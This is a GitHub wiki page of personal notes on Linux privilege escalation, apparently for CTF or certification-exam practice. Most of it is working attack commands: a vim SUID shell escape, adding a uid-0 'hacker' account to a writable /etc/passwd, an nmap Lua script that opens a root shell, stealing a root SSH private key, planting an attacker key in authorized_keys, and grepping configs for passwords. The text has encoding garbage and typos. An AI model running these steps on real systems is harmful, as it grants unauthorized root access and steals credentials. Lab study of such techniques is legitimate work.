Escalate the Privileges - singirikondamani/Noted GitHub Wiki

After getting the user-level access to the machine with 0.0.0.0 need to escalate the privileges to the root users.

Method 1:

  • Step 1: Check what ports open on IP like β†’ nmap -p- 0.0.0.0
  • Step 2: Access to the machine β†’ ssh [email protected]
  • Step 3: Enter the Password provide if any β†’ :**********
  • Step 4: Run and check user β†’ :whoami β†’ sudo -l β†’ pwd
  • Step 5: If user in the sudo list which means can able to perform the root action β†’ pwd ,cd, cat to open the root flag file.

Method 2 Additional Methods:

Search for passwords: Find any password can find in system grep -i password /etc/*

Method 3: Exploiting SUID Binaries:

  • Run: find / -perm -4000 -type f >/dev/null β†’ Look for files with SUID (check for /find/ or /vim.basic).
  • Check permissions: ls -la /usr/bin/vim.basicβ†’ Look for -rwsr-xr-x (the s shows the file has SUID set, meaning it runs as root).
  • Exploit: Run Vim with payload in terminal : vim -c ':!sh'β†’ This gives a root shell because Vim runs with root privileges.
  • Confirm: Run whoamiβ†’ You should see the root.

Method 4: Checking File Permissions:

  • Finding Files with Weak Permissions β†’ ls -la /etc/passwd /etc/shadow β†’ Look for files that have written permission for group and other users -rw-rw-r-- 1
  • Escalation – Exploiting Weak Permissions on /etc/passwd cp /etc/passwd /tmp/passwd_backupβ†’Edit /etc/passwd to add a new root user β†’ hacker:x:0:0:Hacker:/root:/bin/bash
  • In terminal β†’ su hacker
  • Confirm: Run whoamiβ†’ You should see the root.

Method 5: Root Gain access.

  • After gaining the access to root machine in cmd run theβ†’ TF=$(mktemp)
  • And the run the β†’ echo 'os.execute("/bin/sh")' > $TF
  • And run β†’sudo nmap -- script=$TF This process is exploiting Nmap's scripting engine to run a custom Lua script that opens a root shell, allowing the attacker to gain root access by executing system commands as the root user.

Method 6: Root Gain access(Horizontal)

  • Simple after login to the remote server run - sudo -l which show do we have right to run the sudo if we don't have access it will display no pass but if it say other user got permission to bin/bash the follow below commands
  • sudo -u user2 /bin/bash - will help to go on root with other user because that user got root access as seen in error message

Method 7: Root Gain access(Vertical)

  • For example if can able to do ssh with normal user but can't access files inside the /root folder got to the .ssh folder copy the id_rsa key privite key.
  • Copy the key in local or attacker machine as nano id_rsa
  • Give the file permission chmod 600 id_rsa
  • now try to access the remote system with ssh [email protected] -P 50706 -i id_rsa. **TIP: If you have access to change the authorized_key file in ssh can add public key of hacker to to autjorized_key file and login with hacker private key to server.

Method 8: Root Gain access

  • Identify the password of the root using in the the var/www/html folder run - cd var/www/html
  • Identify any file content the password by running - ls
  • or run - grep -nr "db-user"
  • Observer the output and get the password from any db config file.

Method 8: Root Gain access

  • Automate the process by : Linenu
  • and : Linpass
  • From these tools able to find the CVE and later go to the exploit DB find and run those scripts to pass the exam